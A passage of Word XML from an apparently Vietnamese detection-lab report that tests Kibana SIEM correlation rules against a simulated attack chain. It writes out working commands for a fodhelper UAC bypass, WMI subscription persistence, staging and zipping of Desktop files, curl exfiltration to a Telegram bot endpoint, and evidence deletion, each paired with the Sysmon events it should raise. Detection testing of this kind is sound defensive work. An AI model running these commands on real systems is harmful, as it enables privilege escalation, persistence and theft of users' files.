      </w:r>
    </w:p>
    <w:p w14:paraId="65C9CDB8"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Start-Process fodhelper.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5FBF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56FEF5D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Step 3: Spawn wscript (sinh EID 1 voi parent=fodhelper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E29EFC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(fodhelper tu dong spawn wscript theo registry value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E17C3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5A681829"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Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6673BB3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reg delete "HKCU\Software\Classes\ms-settings" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E29437"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0F5CA3E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Ket qua ky vong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7009797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C1 fire: sequence EID 13 (ms-settings) -&gt; EID 1 (fodhelper) -&gt; EID 1 (wscript)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3684A7D3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#   Severity: High | Risk: 73 | maxspan: 30s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69940FDA" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00602E07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ABE9E24" wp14:editId="14DFE986">
            <wp:extent cx="6120130" cy="1907540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115784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43174" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1907540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A271BB4" w14:textId="53D58F91" w:rsidR="00B01B4A" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 20: </w:t>
      </w:r>
      <w:r w:rsidRPr="0007495C">
        <w:t>Alert C1 — UAC Bypass via Fodhelper xuất hiện trong Kibana SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A6C2C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 4 — Test C2 (WMI Persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84C7F9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Chay payload.ps1 voi quyen Admin (sau khi da co Admin tu UAC bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F87C3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Hoac test thu cong WMI subscription:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C12A6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5E83CF7C"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powershell -ep bypass -Command {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BBB8B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$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AB0BB2"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Name='TestFilter'; EventNameSpace='root\cimv2'; QueryLanguage='WQL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EC67C2"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Query="SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name='notepad.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755561E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6798DDDC"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$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E843B2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Name='TestConsumer'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD44A4"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CommandLineTemplate='cmd.exe /c echo test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F37E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773030B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Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECAE017"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Filter=$filter; Consumer=$consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1803832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 Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA92B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Write-Host '[+] WMI subscription installed'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AFE0C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0F97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548EFB4F"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Cleanup sau khi test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BDE9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Get-WMIObject -NS root\subscription -Class __FilterToConsumerBinding | Remove-WmiObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A6247C"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Get-WMIObject -NS root\subscription -Class CommandLineEventConsumer -Filter "Name='TestConsumer'" | Remove-WmiObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D291A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Get-WMIObject -NS root\subscription -Class __EventFilter -Filter "Name='TestFilter'" | Remove-WmiObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A56A8"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014B6492"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Ket qua ky vong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DD9FB"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C2 fire: sequence EID 19 -&gt; EID 20 -&gt; EID 21 within 30s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F803AB7" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#   Severity: Critical | Risk: 99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8CE18B" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00602E07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25AD60D7" wp14:editId="2DF14211">
            <wp:extent cx="6120130" cy="1927225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58094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41455" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1927225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55595D30" w14:textId="66E59725" w:rsidR="00B01B4A" w:rsidRPr="00602E07" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00602E07">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 21: </w:t>
      </w:r>
      <w:r w:rsidRPr="00602E07">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Alert C2 — WMI Persistence Full Install Chain xuất hiện trong Kibana SIEM với severity=Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3E5226" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 5 — Test C3 (WMI Consumer Activated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E26262" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Sau khi da cai WMI subscription (Phase 4), mo notepad.exe de trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E516A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Start-Process notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A1EDD7"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142E124C"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WMI Consumer se tu dong chay svhw.ps1 trong vong 5 giay (WITHIN 5 trong WQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4680A222"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svhw.ps1 chay duoi SYSTEM qua WmiPrvSE.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD8D8D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4D040F9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Ket qua ky vong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD7F3DF"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C3 fire: WmiPrvSE.exe -&gt; powershell.exe/SYSTEM -&gt; arp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB372D4"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S3 fire: WmiPrvSE.exe spawns powershell.exe (SYSTEM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D5258F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#   Severity: High | Risk: 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1CA8F1" w14:textId="77777777" w:rsidR="00602E07" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00602E07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7504618B" wp14:editId="6C3C2BC8">
            <wp:extent cx="6120130" cy="2151380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="58023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31163" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2151380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="000EA323" w14:textId="3EC7BBEF" w:rsidR="00B01B4A" w:rsidRDefault="00602E07" w:rsidP="00602E07">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 22: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5488">
        <w:t>Alert C3, S3, xuất hiện đồng thời trong Kibana SIEM sau khi mở notepad.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13093B14" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 6 — Test C4 (Collection + Exfil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642C2A95" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># svhw.ps1 tu dong chay sau khi notepad.exe mo (tiep theo Phase 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6A787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Hoac test thu cong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B2027"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022D4C3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Tao staging directory va copy file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED2925C"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$wd = 'C:\Windows\Temp\testdmp'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4590D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New-Item -ItemType Directory $wd -Force | Out-Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD35D07"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Copy-Item 'C:\Users\*\Desktop\*.txt' $wd -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4C138"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6095359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Tao ZIP (sinh EID 11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734ECAB"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Compress-Archive -Path "$wd\*" -DestinationPath 'C:\Windows\Temp\testdmp.zip' -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246832A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4C6C75BB"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Exfil (sinh EID 3) — dung curl de upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED55D4" w14:textId="11A79BED"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curl.exe -s -F 'chat_id=' -F 'document=@C:\Windows\Temp\testdmp.zip'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6702B07B"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'https://api.telegram.org/bot&lt;TOKEN&gt;/sendDocument'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D39524C"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4B1711D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lastRenderedPageBreak/>
        <w:t># Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F15269F"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Remove-Item $wd -Recurse -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79778BB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Remove-Item 'C:\Windows\Temp\testdmp.zip' -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3798CF"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41EE395B"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Ket qua ky vong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B312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C4 fire: EID 11 (file staging) -&gt; EID 11 (zip) -&gt; EID 3 (HTTPS) within 2m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D39578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S4 fire: powershell.exe/SYSTEM outbound HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF658D" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#   Severity: Critical | Risk: 99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B07710" w14:textId="77777777" w:rsidR="006D2C1A" w:rsidRDefault="00602E07" w:rsidP="006D2C1A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="00602E07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51E780B0" wp14:editId="0A879DBC">
            <wp:extent cx="6120130" cy="1834515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81279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93240" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1834515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3496EE87" w14:textId="4961D9F6" w:rsidR="00602E07" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 23: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B538E">
        <w:t>Alert C4 — Collection → Archive → Exfiltration xuất hiện trong Kibana SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3311BA5B" w14:textId="77777777" w:rsidR="006D2C1A" w:rsidRPr="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A"/>
    <w:p w14:paraId="684B31C2" w14:textId="77777777" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C290BA" wp14:editId="5D19CA42">
            <wp:extent cx="6120130" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="164728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89000" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1885950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E393360" w14:textId="4C0EA5FF" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 24: </w:t>
      </w:r>
      <w:r w:rsidRPr="007F776D">
        <w:t>Alert S4 — SYSTEM PowerShell Outbound HTTPS fire độc lập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56316DB6" w14:textId="77777777" w:rsidR="006D2C1A" w:rsidRPr="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A"/>
    <w:p w14:paraId="7C43F9D0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 7 — Test C5 (Cleanup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D39620" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># C5 fire tu dong sau Phase 6 (cleanup la mot phan cua svhw.ps1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E33235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Test thu cong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADE9E29"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29666C87"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Simulate network event da xay ra (C5 sequence bat EID 3 truoc EID 23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E448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Sau do xoa file de sinh EID 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077751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Remove-Item 'C:\Windows\Temp\testdmp.zip' -Force  # sinh EID 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4A85C"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664BAE8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Ket qua ky vong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0074755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C5 fire: EID 3 (outbound HTTPS) -&gt; EID 23 (file deletion) within 120s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC5AEAC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>#   Severity: High | Risk: 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E2FF5" w14:textId="77777777" w:rsidR="006D2C1A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="006D2C1A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E8A85A" wp14:editId="01F532FA">
            <wp:extent cx="6120130" cy="1985645"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28437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70171" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1985645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CAB4D5" w14:textId="701A715C" w:rsidR="00B01B4A" w:rsidRDefault="006D2C1A" w:rsidP="006D2C1A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 25: </w:t>
      </w:r>
      <w:r w:rsidRPr="0012071B">
        <w:t>Alert C5 — Exfiltration → Indicator Removal xuất hiện trong Kibana SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0105721B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F726BD" w14:textId="24100690" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XI. KIỂM THỬ TOÀN BỘ KILL CHAIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95EB97" w14:textId="3095453B" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.1 Phương Pháp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7BD760" w14:textId="091F040B" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm thử full chain được thực hiện bằng cách chạy setup.bat từ đầu và để attack chain tự động hoàn thành 7 phases. Sau khi chạy, mở notepad.exe để kích hoạt WMI Consumer. Mục tiêu: xác nhận tất cả </w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> rules đều fire</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60023758" w14:textId="7D12783B" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A863A4">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.2 Test Script — Full Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50121105" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:sz="10" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="80" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="240" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># === FULL ATTACK CHAIN TEST ===</w:t>
      </w:r>
    </w:p>
